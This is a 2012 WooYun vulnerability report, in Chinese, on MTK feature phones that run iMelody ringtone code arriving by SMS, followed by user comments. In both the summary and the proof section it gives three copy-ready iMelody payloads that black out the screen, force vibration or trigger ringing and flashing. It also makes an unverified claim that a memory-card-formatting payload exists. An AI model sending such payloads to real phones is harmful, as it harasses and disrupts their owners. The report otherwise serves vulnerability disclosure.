当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06502

漏洞标题:MTK手机短信漏洞大曝光0day

相关厂商:联发科技股份有限公司

漏洞作者: 小俊

提交时间:2012-04-28 16:15

修复时间:2012-04-28 16:15

公开时间:2012-04-28 16:15

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这些情况都是由于MTK手机支持的一种imy格式铃声引起的,在短信内容中加载不同的imy文件会造成不同的效果。这种imy文件的内容具体如下:(注意,代码为两行#之间的部分,不包括#)

 1.黑屏

###########################
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
###########################

  2.猛震

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY
###########################

  3.振铃

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY
###########################

详细说明:

这个漏洞的精髓就是imy文件。据了解,imy文件是索爱最早支持的一种代码形式的单音节铃声,可以用代码调用手机的解码芯片发出一些声音甚至一些核心指令。所以代码里面如果是诸如黑屏、响铃等类似的命令,发送给对方后,一旦打开也就触发了这些命令,当然会造成相应的结果。目前看来,只要有人能够懂得这些代码的编写语言,发送格式化储存卡一类的短信应该是没有问题的。我手里就有一个格式化命令的imy文件,由于担心给他人造成不良后果,一直没有实验。

在我的实验过程中,我发现并非所有屏幕有灰色功能键的手机都能中招,也许这些手机使用的不是MTK方案吧。我推测,既然imy并非MTK手机专有格式,那么理论上所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,也许只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码,可能会有一些帮助。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话……

漏洞证明:

1.黑屏

###########################
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
###########################

  2.猛震

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY
###########################

  3.振铃

###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY
###########################

修复方案:

版权声明:转载请注明来源 小俊@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:6 (WooYun评价)

漏洞评价:

评论

  1. 2012-04-28 16:31 | lazypeople ( 路人 | Rank:22 漏洞数:6 )

    @小俊 是人才

  2. 2012-04-28 16:41 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    几年前,就出来的文章了。一些网站,又当冷饭炒。所以...

  3. 2012-04-28 16:51 | 小俊 ( 路人 | Rank:16 漏洞数:4 | 喜欢找各式各样的漏洞,喜欢做各式各样的恶...)

    @zeracker 这东西一直都存在,只是一直未公布,那些新闻网站虽然公布了,但却公布在某个角落,谁会看得见呢?

  4. 2012-04-28 16:58 | 笨猪 ( 实习白帽子 | Rank:56 漏洞数:13 | Jarett|最近忙,洞发得少。。)

    几年前的东西了,又炒冷饭。。

  5. 2012-04-28 17:36 | 1cefish ( 实习白帽子 | Rank:47 漏洞数:12 | 作为一个到处漂泊了5年的SB 表示黑客无处不...)

    好久之前的东西了 - - 伤不起

  6. 2012-04-28 18:10 | 牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)

    我是认为啊,不管凉饭热饭,起码几年前没出什么结果与实例,现在又出来了,给这个浮躁的圈子找点研究方向也是正确的,天天xss,注入,也腻了不是?wooyun会让我们看见新的目标,也会让我们看到被遗忘的角落,不是么?

  7. 2012-04-28 18:59 | qing ( 路人 | 还没有发布任何漏洞 | 自由,平等,共享,互助)

    支持!只要还存在就应该得到重视。

  8. 2012-04-28 19:53 | 小俊 ( 路人 | Rank:16 漏洞数:4 | 喜欢找各式各样的漏洞,喜欢做各式各样的恶...)

    @牛奶坦克 说得很对!

  9. 2012-04-28 19:53 | 小俊 ( 路人 | Rank:16 漏洞数:4 | 喜欢找各式各样的漏洞,喜欢做各式各样的恶...)

    @qing 说得对!!

  10. 2012-05-01 06:27 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    请问imy代码怎么插入到短信里?明文,不至于吧?

  11. 2013-03-08 14:58 | 包包 ( 路人 | Rank:6 漏洞数:5 | 我是菜鸟,我怕谁?小弟新来,望大牛多多包...)

    人才

  12. 2013-03-27 14:43 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

    亲,测试过么?

  13. 2013-03-27 22:12 | 包包 ( 路人 | Rank:6 漏洞数:5 | 我是菜鸟,我怕谁?小弟新来,望大牛多多包...)

    @Lee 我是自己测过了